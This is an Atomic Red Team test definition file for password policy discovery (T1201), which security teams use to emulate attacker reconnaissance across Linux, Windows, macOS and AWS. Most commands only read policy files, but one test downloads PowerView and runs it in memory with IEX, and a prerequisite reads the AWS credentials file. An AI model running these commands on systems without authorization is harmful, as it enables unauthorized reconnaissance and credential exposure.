atomic-red-team/atomics/T1201/T1201.yaml

attack_technique: T1201
display_name: Password Policy Discovery
atomic_tests:
- name: Examine password complexity policy - Ubuntu
  auto_generated_guid: 085fe567-ac84-47c7-ac4c-2688ce28265b
  description: |
    Lists the password complexity policy to console on Ubuntu Linux.
  supported_platforms:
  - linux
  executor:
    command: |
      cat /etc/pam.d/common-password
    name: bash
- name: Examine password complexity policy - FreeBSD
  auto_generated_guid: a7893624-a3d7-4aed-9676-80498f31820f
  description: |
    Lists the password complexity policy to console on FreeBSD.
  supported_platforms:
  - linux
  executor:
    command: |
      cat /etc/pam.d/passwd
    name: sh
- name: Examine password complexity policy - CentOS/RHEL 7.x
  auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d
  description: |
    Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
  supported_platforms:
  - linux
  dependencies:
  - description: |
      System must be CentOS or RHEL v7
    prereq_command: |
      if [ $(uname -a | grep -ioP 'el[0-9]' | grep -oP '[0-9]') -eq "7" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      echo Please run from CentOS or RHEL v7
  executor:
    command: |
      cat /etc/security/pwquality.conf
    name: bash
- name: Examine password complexity policy - CentOS/RHEL 6.x
  auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358
  description: |
    Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
  supported_platforms:
  - linux
  dependencies:
  - description: |
      System must be CentOS or RHEL v6
    prereq_command: |
      if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi;
    get_prereq_command: |
      echo Please run from CentOS or RHEL v6
  executor:
    command: |
      cat /etc/pam.d/system-auth
      cat /etc/security/pwquality.conf
    name: bash
- name: Examine password expiration policy - All Linux
  auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a
  description: |
    Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
  supported_platforms:
  - linux
  executor:
    command: |
      cat /etc/login.defs
    name: bash
- name: Examine local password policy - Windows
  auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6
  description: |
    Lists the local password policy to console on Windows.
  supported_platforms:
  - windows
  executor:
    command: |
      net accounts
    name: command_prompt
- name: Examine domain password policy - Windows
  auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4
  description: |
    Lists the domain password policy to console on Windows.
  supported_platforms:
  - windows
  executor:
    command: |
      net accounts /domain
    name: command_prompt
- name: Examine password policy - macOS
  auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742
  description: |
    Lists the password policy to console on macOS.
  supported_platforms:
  - macos
  executor:
    command: pwpolicy getaccountpolicies
    name: bash
- name: Get-DomainPolicy with PowerView
  auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
  description: |
    Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.
  supported_platforms:
  - windows
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
    name: powershell
- name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
  auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
  description: |
    The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
    Upon successful execution a listing of the policy implemented will display.
    Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
  supported_platforms:
  - windows
  executor:
    name: powershell
    elevation_required: false
    command: |
      get-addefaultdomainpasswordpolicy
- name: 'Use of SecEdit.exe to export the local security policy (including the password policy)'
  auto_generated_guid: 510cc97f-56ac-4cd3-a198-d3218c23d889
  description: |
    SecEdit.exe can be used to export the current local security policy applied to a host.
    [Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d)
  supported_platforms:
  - windows
  executor:
    command: |
      secedit.exe /export /areas SECURITYPOLICY /cfg output_mysecpol.txt
    name: command_prompt
    elevation_required: true
- name: Examine AWS Password Policy
  auto_generated_guid: 15330820-d405-450b-bd08-16b5be5be9f4
  description: |
    This atomic test will display details about the password policy for the current AWS account.
  supported_platforms:
  - iaas:aws
  dependencies:
  - description: |
      Check if ~/.aws/credentials file has a default stanza is configured
    prereq_command: |
      cat ~/.aws/credentials | grep "default"
    get_prereq_command: |
      echo Please install the aws-cli and configure your AWS defult profile using: aws configure
  executor:
    command: |
       aws iam get-account-password-policy
    name: sh
    elevation_required: false